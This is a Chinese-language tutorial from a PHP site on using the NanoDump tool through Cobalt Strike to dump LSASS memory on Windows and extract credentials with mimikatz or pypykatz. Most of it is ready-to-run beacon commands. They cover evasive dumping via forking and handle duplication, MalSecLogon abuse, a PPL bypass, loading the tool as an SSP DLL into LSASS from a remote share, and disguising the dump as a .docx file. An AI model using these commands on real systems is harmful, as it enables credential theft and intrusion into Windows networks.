0

0

如何使用NanoDump导出LSASS进程数据

爱谁谁

爱谁谁

发布时间:2025-08-19 08:08:32

|

463人浏览过

|

来源于php中文网

原创

如何使用nanodump导出lsass进程数据

关于NanoDump NanoDump是一款功能强大的MiniDump转储文件提取工具,借助该工具,研究人员可以轻松提取LSASS进程中的MiniDump数据。

功能介绍 工具安装与配置 首先,我们需要使用以下命令将该项目源码克隆到本地:

git clone https://www.php.cn/link/7acce0f7501ebb1f74878d577f16cfd6.git

在Linux系统上,我们需要使用MinGW来编译NanoDump源码:

make -f Makefile.mingw

在Windows系统上,我们需要使用MSVC来编译NanoDump源码:

nmake -f Makefile.msvc

Cobalt Strike导入 接下来,我们需要将生成的NanoDump.cna脚本导入到Cobalt Strike中。

工具使用 我们可以在Cobalt Strike的Beacon控制台中直接运行“nanodump”命令来使用NanoDump:

beacon> nanodump

恢复签名 当你下载了NanoDump生成的MiniDump转储文件之后,可以使用以下命令来恢复无效签名:

scripts/restore_signature 

获取敏感信息 下列命令可以通过mimikatz来获取转储文件中的敏感信息:

mimikatz # sekurlsa::minidump mimikatz # sekurlsa::logonPasswords full

如果你使用的是Linux系统,也可以使用mimikatz的Python 3版本,即pypykatz来获取转储文件中的敏感信息:

python3 -m pypykatz lsa minidump 

以SSP加载NanoDump 我们可以在LSASS中以SSP的形式加载NanoDump,以避免打开一个句柄。此时,转储的数据将使用一个无效签名(默认为C:\Windows\Temp\report.docx)写入磁盘。当转储完成后,DllMain将返回FALSE来控制LSASS卸载NanoDump DLL。

如需修改转储路径和签名配置,可以直接修改entry.c中的NanoDump函数。

NanoDump DLL上传和加载

beacon> load_sspbeacon> delete_file C:\Windows\Temp\[RANDOM].dll

加载本地DLL

beacon> load_ssp c:\ssp.dll

加载远程DLL

beacon> load_ssp \\10.10.10.10\openShare\ssp.dll

PPL绕过

beacon> nanodump_ppl -v -w C:\Windows\Temp\lsass.dmp

工具使用演示 通过创建一个Fork间接读取LSASS进程数据,并使用无效签名将转储文件写入磁盘:

beacon> nanodump --fork --write C:\lsass.dmp

使用MalSecLogon在一个记事本进程中获取LSASS句柄,然后拷贝句柄以访问LSASS,并读取转储信息:

beacon> nanodump --malseclogon --dup --fork --binary C:\Windows\notepad.exe --valid

使用MalSecLogon获取句柄,通过使用Fork间接读取LSASS,并使用无效签名将转储文件写入磁盘:

网趣网上购物系统HTML静态版
网趣网上购物系统HTML静态版

网趣购物系统静态版支持网站一键静态生成,采用动态进度条模式生成静态,生成过程更加清晰明确,商品管理上增加淘宝数据包导入功能,与淘宝数据同步更新!采用领先的AJAX+XML相融技术,速度更快更高效!系统进行了大量的实用性更新,如优化核心算法、增加商品图片批量上传、谷歌地图浏览插入等,静态版独特的生成算法技术使静态生成过程可随意掌控,从而可以大大减轻服务器的负担,结合多种强大的SEO优化方式于一体,使

下载
beacon> nanodump --malseclogon --fork --valid --write C:\Windows\Temp\lsass.dmp

使用无效签名下载转储文件:

beacon> nanodump

拷贝现有句柄,并使用无效签名将转储文件写入磁盘:

beacon> nanodump --dup --write C:\Windows\Temp\report.docx

获取LSASS进程PID:

beacon> nanodump --getpid

在LSASS中以SSP加载NanoDump:

beacon> load_sspbeacon> delete_file C:\Windows\Temp\[RANDOM].dll

在LSASS中以SSP加载NanoDump(远程):

beacon> load_ssp \\10.10.10.10\openShare\nanodump_ssp.x64.dll

转储LSASS并绕过PPL:

beacon> nanodump_ppl --dup --write C:\Windows\Temp\lsass.dmp

工具运行截图 如何使用NanoDump导出LSASS进程数据

许可证协议 本项目的开发与发布遵循Apache-2.0开源许可证协议。

项目地址 https://www.php.cn/link/7acce0f7501ebb1f74878d577f16cfd6

参考资料 https://www.php.cn/link/5a18b2b3a647804eec32e380a70ba66f

https://www.php.cn/link/62cd381bcb4bf2191c555395945e4c09

https://www.php.cn/link/7acce0f7501ebb1f74878d577f16cfd6/blob/main/source/entry.c

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
github中文官网入口 github中文版官网网页进入
github中文官网入口 github中文版官网网页进入

github中文官网入口https://docs.github.com/zh/get-started,GitHub 是一种基于云的平台,可在其中存储、共享并与他人一起编写代码。 通过将代码存储在GitHub 上的“存储库”中,你可以: “展示或共享”你的工作。 持续“跟踪和管理”对代码的更改。

850

2026.01.21

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

762

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1129

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

800

2023.08.01

windows查看端口被占用的情况
windows查看端口被占用的情况

windows查看端口被占用的情况的方法:1、使用Windows自带的资源监视器;2、使用命令提示符查看端口信息;3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容,供大家免费下载体验。

454

2023.08.02

windows无法访问共享电脑
windows无法访问共享电脑

在现代社会中,共享电脑是办公室和家庭的重要组成部分。然而,有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享,影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2354

2023.08.08

windows自动更新
windows自动更新

Windows操作系统的自动更新功能可以确保系统及时获取最新的补丁和安全更新,以提高系统的稳定性和安全性。然而,有时候我们可能希望暂时或永久地关闭Windows的自动更新功能。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

823

2023.08.10

windows boot manager
windows boot manager

windows boot manager无法开机的解决方法:1、系统文件损坏,使用Windows安装光盘或USB启动盘进入恢复环境,选择修复计算机,然后选择自动修复;2、引导顺序错误,进入恢复环境,选择命令提示符,输入命令"bootrec /fixboot"和"bootrec /fixmbr",然后重新启动计算机;3、硬件问题,使用硬盘检测工具进行扫描和修复;4、重装操作系统。本专题还提供其他解决

1626

2023.08.28

俄罗斯Yandex引擎入口
俄罗斯Yandex引擎入口

2026年俄罗斯Yandex搜索引擎最新入口汇总,涵盖免登录、多语言支持、无广告视频播放及本地化服务等核心功能。阅读专题下面的文章了解更多详细内容。

158

2026.01.28

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
Sass 教程
Sass 教程

共14课时 | 0.8万人学习

Bootstrap 4 中文开发手册
Bootstrap 4 中文开发手册

共0课时 | 0人学习

Sass入门到精通视频教程
Sass入门到精通视频教程

共18课时 | 4.3万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号